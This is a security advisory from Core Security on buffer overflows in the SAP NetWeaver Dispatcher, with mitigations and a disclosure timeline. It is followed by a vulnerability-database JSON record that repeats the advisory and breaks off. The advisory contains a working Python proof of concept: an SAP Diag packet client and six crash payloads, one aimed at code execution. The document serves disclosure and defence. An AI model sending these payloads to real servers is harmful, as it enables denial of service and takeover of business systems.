Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514
- Vulnerability Description
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered.
- Vulnerable packages
. SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:
- Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
- Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).
-
Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
-
Credits
These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories .
- Technical Description / Proof of Concept Code
NOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).
The following python script can be used to reproduce the vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args()
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize(sock):
diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00"
user_connect =
"\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8"
support_data = "\x10\x04\x0b\x00\x20"
support_data+=
"\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93"
support_data+=
"\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00"
dpheader =
"\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
dpheader+= struct.pack("I", len(diagheader + user_connect +
support_data))
dpheader+=
"\x00\xff\xff\xff\xff\xff\xff "
dpheader+= "terminalXXXXXXX"
dpheader+=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
send_packet(sock, dpheader + diagheader + user_connect + support_data)
def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom)
Connect and send initialization packet
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection)
-----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. SAP Netweaver DiagTraceR3Info Vulnerability
[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. The following python code can be used to trigger the vulnerability:
/----- crash = "X"114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/
8.2. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/
8.3. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:
/----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/
8.4.
/----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/
8.5.
/----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/
8.6. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.
/----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/
- Report Timeline
. 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published.
- References
[1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.
[4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201205-0129",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1 (disp+work.exe 7010.29.15.58313)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2 (disp+work.exe 7200.70.18.23869)"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2511"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
],
"trust": 0.9
},
"cve": "CVE-2012-2511",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2012-2511",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2511",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-159",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2012-2511",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2511"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002401"
},
{
"db": "NVD",
"id": "CVE-2012-2511"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-159"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ----------------------------------------------------------------------\n\nBecome a PSI 3.0 beta tester!\nTest-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. \nDownload it here!\nhttp://secunia.com/psi_30_beta_launch\n\n----------------------------------------------------------------------\n\nTITLE:\nSAP NetWeaver Denial of Service and Code Execution Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA48980\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/48980/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nRELEASE DATE:\n2012-05-09\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/48980/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/48980/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nCore Security Technologies has reported multiple vulnerabilities in\nSAP NetWeaver, which can be exploited by malicious people to cause a\nDoS (Denial of Service) and compromise a vulnerable system. \n\nThe vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. \n\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nMartin Gallo, Core Security Technologies. \n\nORIGINAL ADVISORY:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. By sending different messages, the different\nvulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information. \n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n 1. Disable work processes\u0027 Developer Traces for the \u0027Dialog\nProcessing\u0027 component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n 2. Restrict access to the Dispatcher service\u0027s TCP ports (3200/3299)\n(for all vulnerabilities). \n 3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]). \n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories . \n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of \u0027Dialog processing\u0027 has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]). \n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize(sock):\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\n dpheader+= \"terminalXXXXXXX\"\n dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n eom = \"\\x0c\"\n send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection) \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n\u0027disp+work.exe\u0027 module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function\n\u0027DiagTraceR3Info\u0027 in the \u0027disp+work.exe\u0027 module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"X\"*114 + \"\\xff\\xff\" # --\u003e Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. This vulnerability could allow a\nremote unauthenticated attacker to conduct a denial of service attack\nagainst the vulnerable systems. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. This vulnerability could allow a remote\nunauthenticated attacker to conduct a denial of service attack. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. \n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. \n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. This\nvulnerability could allow a remote unauthenticated attacker to conduct a\ndenial of service attack. \n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012. 2012-01-24:\nCore sends an advisory draft with technical details. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP\u0027s\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP\u0027s guidelines as much as possible. 2012-02-21:\nFirst release date missed. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012. 2012-02-23:\nCore re-schedules the advisory publication to May 8th. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received). 2012-05-07:\nCore asks again for the status of the fix. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8]. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information. 2012-05-08:\nAdvisory CORE-2012-0123 published. \n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP\u0027s legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
